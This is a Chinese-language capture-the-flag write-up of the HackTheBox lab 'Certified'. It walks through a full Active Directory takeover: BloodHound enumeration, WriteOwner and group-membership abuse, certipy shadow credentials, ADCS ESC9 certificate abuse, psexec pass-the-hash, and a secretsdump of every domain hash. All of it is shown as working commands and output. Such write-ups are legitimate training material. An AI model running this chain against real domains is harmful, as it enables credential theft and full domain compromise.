基本信息

https://app.hackthebox.com/machines/Certified
10.10.11.41

这周机器开始测试新模式，直接给了低权限用户名密码

As is common in real life Windows pentests, you will start the Certified box with credentials for the following account: judith.mader / judith09

端口扫描

没有web端口，常规域端口：

$ nmap -sC -sV -Pn 10.10.11.41
Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-04 13:28 CST
Nmap scan report for 10.10.11.41
Host is up (0.070s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-04 12:16:53Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-04T12:18:18+00:00; +6h47m20s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-11-04T12:18:18+00:00; +6h47m21s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-11-04T12:18:18+00:00; +6h47m20s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-11-04T12:18:18+00:00; +6h47m21s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-11-04T12:17:40
|_  start_date: N/A
|_clock-skew: mean: 6h47m20s, deviation: 0s, median: 6h47m20s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.85 seconds

bloodhound

因为已经给了低权限账户，所以添加hosts后直接先bloodhound收集分析

1
2
3

10.10.11.41 certified.htb dc01.certified.htb

bloodhound-python -u judith.mader -p judith09 -d certified.htb -c All -dc DC01.certified.htb -gc DC01.certified.htb --zip  --dns-tcp -ns 10.10.11.41

可以看到一条很明确的路径，judith.mader对management组有writeowner，management组对management_svc有genericwrite:

所以就是judith.mader先利用writeowner把自己设置为management组owner，然后添加自己进去，之后滥用对management_svc的genericwrite来获取management_svc

management

第一步滥用writeowner

Grant ownership | The Hacker Recipes
https://www.thehacker.recipes/ad/movement/dacl/grant-ownership#grant-ownership

1	bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 set owner management judith.mader

然后给自己添加成员的权限后添加自己到management组中：

AddMember | The Hacker Recipes
https://www.thehacker.recipes/ad/movement/dacl/addmember

1
2
3

python3 examples/dacledit.py -action write -rights WriteMembers -principal judith.mader -target-dn "CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB" certified.htb/judith.mader:judith09

bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 add groupMember management judith.mader

management_svc

之后滥用对management_svc的genericwrite权限，例如直接shadow creds：

(这里certipy版本可能会坑，mac里4.8.2的不行，kali里4.4.0的正常)

sudo ntpdate -s 10.10.11.41
certipy shadow auto -username judith.mader@certified.htb -p judith09 -account management_svc -dc-ip 10.10.11.41

[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584

CA_OPERATOR

继续根据bloodhound，management_svc对CA_OPERATOR有genericall，那就同样的继续shadow creds获取ca_operator:

1
2
3

certipy shadow auto -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -account ca_operator -dc-ip 10.10.11.41

[*] NT hash for 'ca_operator': b4b86f45c6018f1b664f70805f45d8f2

ADCS

ca_operator根据名称就是对ca的操作相关，所以查看ADCS,发现ESC9：

certipy find -u 'ca_operator' -hashes b4b86f45c6018f1b664f70805f45d8f2 -dc-ip 10.10.11.41 -vulnerable -stdout

certified-DC01-CA
CertifiedAuthentication

ESC9

参考：

Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and more! | by Oliver Lyak | IFCR
https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7

根据文章示例修改命令，滥用esc9得到Administrator：

# 修改ca_operator的upn为Administrator
certipy account update -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator -dc-ip 10.10.11.41

# 请求esc9证书
certipy req -username ca_operator@certified.htb -hashes b4b86f45c6018f1b664f70805f45d8f2 -ca certified-DC01-CA -template CertifiedAuthentication 

# 还原ca_operator的upn
certipy account update -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator@certified.htb -dc-ip 10.10.11.41

# 使用esc9证书认证，得到Administrator
certipy auth -pfx administrator.pfx -domain certified.htb

Flags

之后就是Administrator hash登录：

1	python3 examples/psexec.py Administrator@10.10.11.41 -hashes :0d5b49608bbce1751f708748f67e2d34

hashdump

$ python3 examples/secretsdump.py Administrator@10.10.11.41 -hashes :0d5b49608bbce1751f708748f67e2d34 -just-dc-ntlm
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:41c6e6d9e7fe3f175b42df14a3815969:::
certified.htb\judith.mader:1103:aad3b435b51404eeaad3b435b51404ee:8ec62ac86259004c121a7df4243a7a80:::
certified.htb\management_svc:1105:aad3b435b51404eeaad3b435b51404ee:a091c1832bcdd4677c28b5a6a1295584:::
certified.htb\ca_operator:1106:aad3b435b51404eeaad3b435b51404ee:b4b86f45c6018f1b664f70805f45d8f2:::
certified.htb\alexander.huges:1601:aad3b435b51404eeaad3b435b51404ee:cde915082011eef6f107ab4384124983:::
certified.htb\harry.wilson:1602:aad3b435b51404eeaad3b435b51404ee:37a50354c4a799ace944d130ed34cd03:::
certified.htb\gregory.cameron:1603:aad3b435b51404eeaad3b435b51404ee:b7ef92685ee618fc477f6b7668a829af:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:8f3cbea3908ffcde111e6a077c37dac4:::
[*] Cleaning up...

参考资料

Grant ownership | The Hacker Recipes
https://www.thehacker.recipes/ad/movement/dacl/grant-ownership#grant-ownership
AddMember | The Hacker Recipes
https://www.thehacker.recipes/ad/movement/dacl/addmember
Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and more! | by Oliver Lyak | IFCR
https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7

Certified - HackTheBox

2024-11-04